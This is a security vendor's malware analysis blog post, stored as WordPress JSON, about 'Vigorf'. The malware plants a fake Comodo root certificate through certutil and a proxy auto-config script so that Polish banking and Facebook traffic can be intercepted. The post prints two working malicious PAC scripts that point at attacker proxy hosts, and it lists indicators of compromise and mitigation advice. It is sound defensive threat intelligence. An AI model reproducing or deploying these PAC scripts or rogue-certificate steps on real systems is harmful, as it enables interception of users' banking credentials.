{"id":2667,"date":"2024-09-25T19:22:09","date_gmt":"2024-09-25T19:22:09","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2667"},"modified":"2025-07-29T06:03:45","modified_gmt":"2025-07-29T06:03:45","slug":"vigorf-malware-intercepting-facebook-and-banking-traffic","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/vigorf-malware-intercepting-facebook-and-banking-traffic\/","title":{"rendered":"Vigorf Malware Intercepting Facebook and Banking Traffic"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"265\" height=\"318\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/peeking-owl.webp\" alt=\"\" class=\"wp-image-2686\" style=\"aspect-ratio:1;width:782px;height:auto\"\/><\/figure>\n<\/div>\n\n\n<p><strong>Vigorf Malware Intercepting Facebook and Banking Traffic&nbsp;<\/strong><\/p>\n\n\n\n<p>LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites.&nbsp;<\/p>\n\n\n\n<p>Dubbed \u2018Vigorf\u2019, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of Vigorf is that it uses a fake Comodo SSL certificate as part of the malware payload installer, as well as a proxy server to bypass network security. 
&nbsp;<\/p>\n\n\n\n<p>At a high level, the attack chain is as follows:&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The victim receives a spam email containing an embedded OLE object in a Word document that executes the PowerShell script \u201cinstaller.ps1\u201d&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The malicious file \u201cpl.exe\u201d is downloaded and executed&nbsp;<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;The malware \u201cpl.exe\u201d adds a fake Comodo SSL certificate, saved in the Temp folder, to the Root Trust store<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;A Proxy Auto Configuration (PAC) script is added to the System Proxy settings<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;When a victim visits any of the sites mentioned in the PAC script, the proxy is enabled, and attackers can snoop on the victim\u2019s communications<\/p>\n\n\n\n<p>The sites currently listed in the PAC script are largely banking sites including the Polish banks MBank, GetIn Bank, Alior Bank, and iPKO, as well as the Polish presence of ING.<\/p>\n\n\n\n<p>Beyond banking sites, Facebook\u2019s Polish site is also included in the PAC script.&nbsp;<\/p>\n\n\n\n<p>Whenever a user infected by Vigorf visits any of the above sites, the attackers are able to see all the user\u2019s previously encrypted communications, including login credentials.<\/p>\n\n\n\n<p><strong>Installer Details \u2013 \u201cinstaller.ps1\u201d<\/strong><\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;MD5: 43da184a59baa821ea7c4e25e6fde4d5<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;Filename: installer.ps1<\/p>\n\n\n\n<p>The PowerShell-based installer uses a fake Comodo Root Certificate for SSL-based connections. This allows the attacker to have \u2018man-in-the-middle\u2019 functionality, intercepting traffic without triggering security warnings. 
This particular tradecraft has not been seen in the wild since <a href=\"https:\/\/www.trendmicro.de\/cloud-content\/us\/pdfs\/security-intelligence\/white-papers\/wp-finding-holes-operation-emmental.pdf\" target=\"_blank\" rel=\"noopener\">Operation Emmental<\/a> in 2014.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"516\" height=\"716\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-48.webp\" alt=\"\" class=\"wp-image-2676\"\/><\/figure>\n\n\n\n<p><em>Image 1: Fake Comodo SSL Certificate<\/em><\/p>\n\n\n\n<p>The PowerShell script contains the certificate in encoded form. It is written to the file \u201c_w41415_log.log\u201d inside the user\u2019s Temp folder. It is also added to the Root Trust Store of the infected system using the Windows utility \u201ccertutil.exe\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"775\" height=\"602\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-46.webp\" alt=\"\" class=\"wp-image-2677\"\/><\/figure>\n\n\n\n<p><em>Image 2: Fake Root Cert used by Vigorf&nbsp;<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"881\" height=\"122\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-45.webp\" alt=\"\" class=\"wp-image-2678\"\/><\/figure>\n\n\n\n<p><em>Image 3: Windows utility \u201ccertutil.exe\u201d is used to add the certificate to the Root store<\/em><\/p>\n\n\n\n<p>Once the certificate has been added, the installer then connects to an IP to download the malware and save it in the user\u2019s local AppData folder (\u201cC:\\Users\\&lt;username&gt;\\AppData\\Local\u201d) with a random file name.&nbsp;<\/p>\n\n\n\n<p>The downloaded malware is then executed as a separate process. Initially, the IP address hosting the malware belonged to VULTR, a cloud provider, but at the time of writing this IP had been taken offline. 
As we have seen the attackers recently update their proxy scripts (further below), we believe the malware is being hosted on a new site and the campaign is still active.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"881\" height=\"264\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/4-46.webp\" alt=\"\" class=\"wp-image-2679\"\/><\/figure>\n\n\n\n<p><em>Image 4: Malware payload download URL used in the script&nbsp;<\/em><\/p>\n\n\n\n<p>The PowerShell script also references another IP (45[.]55[.]107[.]240), which we have identified as the Command and Control server.<\/p>\n\n\n\n<p><strong>Malware Details \u2013 \u201cpl.exe\u201d<\/strong><\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;MD5: 4535642aada6b2e12cf9f620113fc377<\/p>\n\n\n\n<p>\u2022&nbsp;&nbsp; &nbsp;Filename: pl.exe<\/p>\n\n\n\n<p>After being downloaded, \u201cpl.exe\u201d again executes \u201ccertutil.exe\u201d in order to add the certificate from the file \u201c_w41415_log.log\u201d to the system Root Trust Store \u2013 as seen below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"416\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/5-43.webp\" alt=\"\" class=\"wp-image-2680\"\/><\/figure>\n\n\n\n<p><em>Image 5: Execution of \u201ccertutil.exe\u201d to add the certificate from \u201c_w41415_log.log\u201d<\/em><\/p>\n\n\n\n<p>Vigorf then executes a PAC file which contains a set of rules coded in JavaScript. These rules let a web browser determine whether to send web traffic directly to the Internet or via a proxy server.<\/p>\n\n\n\n<p>PAC files control how a web browser handles HTTP, HTTPS, and FTP traffic. We observed the malware calling out to [http]:\/\/spiderbat[.]top\/corporate2\/index.js=14854f&#8230; (below). This is the URL which contains the PAC scripts. 
During intelligence gathering, we noticed the attackers updating the scripts.&nbsp;<\/p>\n\n\n\n<p>In simple terms, the PAC script contains the list of sites whose traffic the attackers can intercept when an infected user visits them.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"375\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/6-41.webp\" alt=\"\" class=\"wp-image-2681\"\/><\/figure>\n\n\n\n<p><em>Image 6: Malware downloading the \u201cJavaScript\u201d PAC file<\/em><\/p>\n\n\n\n<p>While writing this article, we observed that the attackers changed their proxy server, as the previous IP was marked as malicious by OSINT services. This suggests the campaign is ongoing. The AutoConfigURL setting points to a web address that contains the below proxy settings \u2013 once Vigorf is successfully executed, these settings are enforced for the infected system.&nbsp;<\/p>\n\n\n\n<p><strong>Old PAC script:<\/strong><\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;<code>function FindProxyForURL(url, host) { var proxy = &quot;PROXY coughsmoggyspark.co:8001;&quot;; var hosts = new Array('*whoer.net','*.ipko.pl*','*mbank.pl*','login.ingbank.pl*','*centrum24.pl*'); for (var i = 0; i &lt; hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return &quot;DIRECT&quot; }<\/code><\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;<code>function FindProxyForURL(url, host) { var proxy = &quot;PROXY 209.250.247.168:8001;&quot;; var hosts = new Array('*whoer.net','*.ipko.pl*','*mbank.pl*','login.ingbank.pl*','*centrum24.pl*'); for (var i = 0; i &lt; hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return &quot;DIRECT&quot; }<\/code><\/p>\n\n\n\n<p><strong>New PAC script:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" 
height=\"210\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/7-39.webp\" alt=\"\" class=\"wp-image-2682\"\/><\/figure>\n\n\n\n<p><em>Image 7: New PAC script of the campaign<\/em><\/p>\n\n\n\n<p>The above captured code snippet shows the attackers are continuously changing the proxy server but using the same port (8001). Additionally, they\u2019re only enabling this proxy for specific .pl (Poland) top-level domain sites. Also, attackers are continuously adding new domains to which the proxy settings apply.<\/p>\n\n\n\n<p>Proxy servers:<\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;coughsmoggyspark.co<\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;209.250.247.168<\/p>\n\n\n\n<p>3.&nbsp;&nbsp; &nbsp;209.250.251.127<\/p>\n\n\n\n<p>Proxy-enabled sites:<\/p>\n\n\n\n<p>1.&nbsp;&nbsp; &nbsp;*.whoer.net<\/p>\n\n\n\n<p>2.&nbsp;&nbsp; &nbsp;*wp.pl<\/p>\n\n\n\n<p>3.&nbsp;&nbsp; &nbsp;*.o2.pl<\/p>\n\n\n\n<p>4.&nbsp;&nbsp; &nbsp;*facebook.pl<\/p>\n\n\n\n<p>5.&nbsp;&nbsp; &nbsp;*ipko.pl*<\/p>\n\n\n\n<p>6.&nbsp;&nbsp; &nbsp;*mbank.pl*<\/p>\n\n\n\n<p>7.&nbsp;&nbsp; &nbsp;*login.ingbank.pl*<\/p>\n\n\n\n<p>8.&nbsp;&nbsp; &nbsp;*centrum24.pl*<\/p>\n\n\n\n<p>9.&nbsp;&nbsp; &nbsp;*secure.getinbank.pl*<\/p>\n\n\n\n<p>10.&nbsp;&nbsp; &nbsp;*aliorbank.pl*<\/p>\n\n\n\n<p>The three proxy servers above are attacker-controlled, and represent the infrastructure used to intercept traffic and steal credentials. The 10 proxy-enabled sites are the sites being targeted by the attacker with their PAC script. 
This means that when a user infected by Vigorf visits any of these sites, the user\u2019s traffic will not go directly to those sites but will pass through an attacker-controlled proxy server \u2013 which is capable of SSL interception thanks to the attacker having already installed their fake SSL certificate in the Root trust store.&nbsp;<\/p>\n\n\n\n<p>Thus, the infected system completely trusts the proxy server, and the proxy server is able to decrypt and re-encrypt the packets, giving the attacker man-in-the-middle abilities without raising any browser security alerts.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"368\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/8-34.webp\" alt=\"\" class=\"wp-image-2683\"\/><\/figure>\n\n\n\n<p><em>Image 8: Attackers are able to intercept traffic between victims and the Polish bank mBank<\/em>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"550\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/9-30.webp\" alt=\"\" class=\"wp-image-2684\"\/><\/figure>\n\n\n\n<p><em>Image 9: Attackers are able to intercept traffic between victims and the Polish presence of ING&nbsp;<\/em><\/p>\n\n\n\n<p>Below is an illustration to help visualise how the traffic is intercepted. Once a victim visits one of the 10 proxy-enabled sites and enters their login details, the traffic is sent to the proxy server, decrypted and collected by the attacker, before being re-encrypted and sent to the site. 
The attacker now has the victim\u2019s login details and can use them at will.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"860\" height=\"502\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/10-29.webp\" alt=\"\" class=\"wp-image-2685\"\/><\/figure>\n\n\n\n<p><em>Image 10: Packet flow illustration of the traffic interception used by the threat actors.<\/em><\/p>\n\n\n\n<p><strong>Indicators of Compromise<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>MD5<\/td><td>43da184a59baa821ea7c4e25e6fde4d5<\/td><td>installer.ps1<\/td><\/tr><tr><td>SHA1<\/td><td>763150139510937b182e51f72ccbe28a1934c4cc<\/td><td>installer.ps1<\/td><\/tr><tr><td>SHA256<\/td><td>f91927897b5aed4c3454eca429bd2cb416bdd6deb4f80c68b420c8699b6c63fa<\/td><td>installer.ps1<\/td><\/tr><tr><td>IPV4<\/td><td>140[.]82[.]33[.]56<\/td><td>Malware host<\/td><\/tr><tr><td>IPV4<\/td><td>45[.]55[.]107[.]240<\/td><td>CNC<\/td><\/tr><tr><td>MD5<\/td><td>80A3A7F3DA32CBF6E324B26AF7D2EEFF<\/td><td>_w41415_log.log<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/spiderbat[.]top\/corporate2\/index.js<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/glibitchyard[.]co\/corporate2\/index.js<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>hxxp:\/\/spiderbat[.]top\/corporate2\/<\/td><td>PAC URL<\/td><\/tr><tr><td>DOMAIN<\/td><td>coughsmoggyspark[.]co<\/td><td>Proxy Server<\/td><\/tr><tr><td>IPV4<\/td><td>209[.]250[.]247[.]168<\/td><td>Proxy Server<\/td><\/tr><tr><td>IPV4<\/td><td>209[.]250[.]251[.]127<\/td><td>Proxy Server<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>Mitigation&nbsp;<\/strong><br><br>Users are encouraged to update existing security solutions with the IOCs listed above. 
As always, exercise caution when dealing with emails from unknown sources, and do not click on any links or open attachments from emails that are untrusted.&nbsp;<\/p>\n\n\n\n<p>On 2019-03-04<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vigorf Malware Intercepting Facebook and Banking Traffic&nbsp; LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites.&nbsp; Dubbed &lsquo;Vigorf&rsquo;, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2686,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2667"}],"version-history":[{"count":4,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions"}],"predecessor-version":[{"id":4303,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions\/4303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2686"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/w
p\/v2\/categories?post=2667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}